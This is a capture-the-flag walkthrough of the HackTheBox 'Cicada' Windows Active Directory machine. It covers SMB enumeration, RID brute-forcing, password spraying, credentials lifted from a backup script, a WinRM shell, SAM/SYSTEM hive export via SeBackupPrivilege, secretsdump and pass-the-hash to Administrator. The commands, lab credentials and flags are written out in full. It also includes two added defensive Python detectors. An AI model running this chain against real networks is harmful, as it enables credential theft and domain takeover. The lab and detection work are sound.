htb-writeups

Cicada HTB Walkthrough

A comprehensive penetration testing walkthrough for the Cicada machine from HackTheBox.

Overview

Cicada is a medium-difficulty Windows Active Directory machine that involves comprehensive enumeration, password reuse exploitation, and privilege escalation through backup privileges.

Target IP: 10.129.11.232
Domain: CICADA-DC.cicada.htb

Reconnaissance

Network Scanning

Initial port discovery with a full-port TCP connect scan at a high packet rate:

export target=10.129.11.232
sudo nmap -p- --min-rate 5000 -sT -vvv $target

Discovered Open Ports: 53, 88, 135, 139, 389, 445, 464, 593, 636, 3268, 3269, 5985, 50845

Service Enumeration

Comprehensive service version detection and script scanning:

sudo nmap -sC -sV -p 53,88,135,139,389,445,464,593,636,3268,3269,5985,50845 -T4 $target

Key Services Identified:

SMB Enumeration

Anonymous SMB share enumeration revealed accessible shares:

smbclient -N -L //10.129.11.232/

Available Shares:

Initial Access

HR Share Examination

The HR share contained a welcome notice with default credentials (download it from the smbclient session, then read it locally):

smbclient //10.129.11.232/HR
get "Notice from HR.txt"
cat "Notice from HR.txt"

Credentials Discovered:
Default password from the HR notice: Cicada$M6Corpb*@Lp#nZp!8

User Enumeration

RID brute-forcing through the guest account to discover domain users:

crackmapexec smb $target -u 'guest' -p '' --rid-brute 2>/dev/null

Discovered Domain Users:

Credential Spraying

Password spraying the discovered user list with the default password:

crackmapexec smb $target -u users.txt -p 'Cicada$M6Corpb*@Lp#nZp!8' --continue-on-success 2>/dev/null

Valid Credentials Found:
michael.wrightson:Cicada$M6Corpb*@Lp#nZp!8

Lateral Movement

Additional Credential Discovery

Enumerating domain users with Michael’s credentials revealed another user’s password:

crackmapexec smb $target -u 'michael.wrightson' -p 'Cicada$M6Corpb*@Lp#nZp!8' --users 2>/dev/null

Additional Credentials:
david.orelious:aRt$Lp#7t*VQ!3

DEV Share Access

Accessing the DEV share with David’s credentials:

smbclient -U 'david.orelious%aRt$Lp#7t*VQ!3' //10.129.11.232/DEV

Discovered File: Backup_script.ps1

Backup Script Analysis

The PowerShell backup script contained hardcoded credentials:

$username = "emily.oscars"   # account the backup job runs as
$password = ConvertTo-SecureString "Q!3@Lp#M6b*7t*Vt" -AsPlainText -Force   # password stored as a plaintext literal

New Credentials: emily.oscars:Q!3@Lp#M6b*7t*Vt
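
The pattern in Backup_script.ps1 (a password literal handed to ConvertTo-SecureString -AsPlainText) is easy to find mechanically before an attacker does. The scanner below is an added example, not part of the original write-up: the rules and the sample script are constructed (the sample reuses the two lines quoted above plus benign lines that should not fire), and findings carry a masked value so the report itself does not leak the secret.

```python
"""Scan scripts on a share for hard-coded credentials (added example)."""
import re
from pathlib import Path
from typing import NamedTuple


class Finding(NamedTuple):
    file: str
    line: int
    kind: str
    masked_value: str


# Each rule captures the literal secret in group 1.
RULES = [
    ("ConvertTo-SecureString plaintext literal",
     re.compile(r'ConvertTo-SecureString\s+["\']([^"\']+)["\']\s+-AsPlainText', re.I)),
    ("password variable assigned a literal",
     re.compile(r'\$(?:pass(?:word)?|pwd|secret)\s*=\s*["\']([^"\']+)["\']', re.I)),
    ("credential passed on a command line",
     re.compile(r'(?:(?:-p|--password)\s+|/pass:)["\']?([^\s"\']+)', re.I)),
]

SCRIPT_SUFFIXES = {".ps1", ".psm1", ".bat", ".cmd", ".vbs"}


def mask(secret: str) -> str:
    """Keep two characters so an analyst can match the finding to the file; hide the rest."""
    return secret[:2] + "*" * (len(secret) - 2) if len(secret) > 2 else "***"


def scan_text(text: str, name: str = "<inline>") -> list:
    """Apply every rule to every line and return masked findings."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        for kind, rule in RULES:
            match = rule.search(line)
            if match:
                findings.append(Finding(name, lineno, kind, mask(match.group(1))))
    return findings


def scan_tree(root: Path) -> list:
    """Walk a mounted share (or any directory) and scan every script file in it."""
    findings = []
    for path in sorted(root.rglob("*")):
        if path.is_file() and path.suffix.lower() in SCRIPT_SUFFIXES:
            try:
                text = path.read_text(errors="replace")
            except OSError:
                continue
            findings.extend(scan_text(text, str(path)))
    return findings


# Constructed sample: the two quoted lines from Backup_script.ps1 plus lines
# that handle credentials properly and must not be reported.
SAMPLE_SCRIPT = '''$sourceDirectory = "D:\\\\data"
$username = "emily.oscars"
$password = ConvertTo-SecureString "Q!3@Lp#M6b*7t*Vt" -AsPlainText -Force
$credentials = New-Object System.Management.Automation.PSCredential($username, $password)
$safeCred = Get-Credential -Message "Enter backup account credentials"
$fromVault = Import-Clixml -Path "$env:USERPROFILE\\\\backup.cred"
'''


if __name__ == "__main__":
    for f in scan_text(SAMPLE_SCRIPT, "Backup_script.ps1"):
        print(f"{f.file}:{f.line}: {f.kind} -> {f.masked_value}")
```

Run scan_tree against a share mounted read-only from a scanning host; the rules are deliberately narrow (a `-Path` argument does not trip the `-p` rule) because a noisy scanner gets switched off.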

WinRM Access

Confirming WinRM access with Emily’s credentials, then opening a shell:

crackmapexec winrm $target -u 'emily.oscars' -p 'Q!3@Lp#M6b*7t*Vt' 2>/dev/null
evil-winrm -i $target -u 'emily.oscars' -p 'Q!3@Lp#M6b*7t*Vt'

User Flag: 3692d04e5db2d48dadce05ee6a469235

Privilege Escalation

Privilege Assessment

Checking user privileges:

whoami /priv

Key Privileges:

SAM Database Extraction

Using SeBackupPrivilege to save the SAM and SYSTEM hives to disk (the file names match those passed to secretsdump below):

reg save HKLM\SAM C:\Users\emily.oscars.CICADA\Documents\SAM
reg save HKLM\SYSTEM C:\Users\emily.oscars.CICADA\Documents\SYSTEM
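
The hive export above is one of the clearest signals a defender gets on this path: reg.exe naming SAM, SYSTEM or SECURITY shows up in process-creation telemetry (event 4688, or Sysmon event 1), and the privilege that makes it work is logged in event 4673 when SeBackupPrivilege is exercised. The detector below is an added example, not part of the original write-up; the events are constructed with a simplified field layout, and the svc_backup allow-list entry is a placeholder for whatever accounts legitimately run backups in a given environment.

```python
"""Detect credential-hive export and SeBackupPrivilege use (added example)."""
import re
from typing import NamedTuple


class WinEvent(NamedTuple):
    event_id: int       # 4688 process creation, 4673 sensitive privilege use
    user: str           # DOMAIN\account
    command_line: str   # populated for 4688
    privileges: str     # populated for 4673


class HiveAlert(NamedTuple):
    rule: str
    user: str
    detail: str


# reg.exe export of a hive that holds credential material.
HIVE_EXPORT = re.compile(
    r"\breg(?:\.exe)?\s+save\s+(?:HKLM|HKEY_LOCAL_MACHINE)\\(SAM|SYSTEM|SECURITY)\b", re.I)

# Accounts expected to exercise backup privileges (constructed allow-list).
BACKUP_SERVICE_ACCOUNTS = {r"CICADA\svc_backup", r"NT AUTHORITY\SYSTEM"}

# Constructed sample: the two exports from this write-up, the privilege use
# behind them, and benign registry activity that must not be flagged.
SAMPLE_EVENTS = [
    WinEvent(4688, r"CICADA\emily.oscars",
             r"reg save HKLM\SAM C:\Users\emily.oscars.CICADA\Documents\SAM", ""),
    WinEvent(4688, r"CICADA\emily.oscars",
             r"reg save HKLM\SYSTEM C:\Users\emily.oscars.CICADA\Documents\SYSTEM", ""),
    WinEvent(4673, r"CICADA\emily.oscars", "", "SeBackupPrivilege"),
    WinEvent(4688, r"CICADA\david.orelious",
             r"reg query HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion", ""),
    WinEvent(4688, r"CICADA\david.orelious",
             r"reg save HKCU\Software\Contoso settings.hiv", ""),
    WinEvent(4673, r"CICADA\svc_backup", "", "SeBackupPrivilege"),
]


def find_hive_exports(events):
    """Process-creation events whose command line exports a credential hive."""
    alerts = []
    for ev in events:
        if ev.event_id != 4688:
            continue
        match = HIVE_EXPORT.search(ev.command_line)
        if match:
            alerts.append(HiveAlert("hive-export", ev.user,
                                    f"{match.group(1).upper()} via: {ev.command_line}"))
    return alerts


def find_backup_privilege_use(events, allowed=BACKUP_SERVICE_ACCOUNTS):
    """4673 events where SeBackupPrivilege is used by an account not on the allow-list."""
    alerts = []
    for ev in events:
        if (ev.event_id == 4673 and "SeBackupPrivilege" in ev.privileges
                and ev.user not in allowed):
            alerts.append(HiveAlert("backup-privilege", ev.user, ev.privileges))
    return alerts


def triage(events):
    """Group rule hits per account so a dump sequence (privilege + two hives) stands out."""
    per_user = {}
    for alert in find_hive_exports(events) + find_backup_privilege_use(events):
        per_user.setdefault(alert.user, []).append(alert.rule)
    return per_user


if __name__ == "__main__":
    for user, rules in triage(SAMPLE_EVENTS).items():
        print(f"{user}: {', '.join(rules)}")
```

Both rules need the underlying audit policy enabled (process creation with command-line logging for 4688, "Audit Sensitive Privilege Use" for 4673); the page's own finding, that SeBackupPrivilege was granted to a standard user, is what the allow-list check is meant to surface.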

Credential Extraction

Using Impacket’s secretsdump on the downloaded hive files (offline, hence LOCAL) to extract password hashes:

impacket-secretsdump -sam SAM -system SYSTEM LOCAL

Administrator NTLM Hash: 2b87e7c93a3e8a0ea4a581937016f341

Administrator Access

Pass-the-hash with the Administrator NTLM hash using Evil-WinRM:

evil-winrm -i $target -u Administrator -H '2b87e7c93a3e8a0ea4a581937016f341'

Root Flag: ff17e2ce0fc4b8e1f0fb7947aa0dd60a

Conclusion

The Cicada machine demonstrated several critical security issues:

  1. Information Disclosure: Default passwords in HR documentation
  2. Password Reuse: Multiple users sharing similar password patterns
  3. Hardcoded Credentials: Sensitive credentials in backup scripts
  4. Excessive Privileges: Backup privileges granted to standard users
  5. Weak Access Controls: Insufficient restriction of sensitive operations

Security Recommendations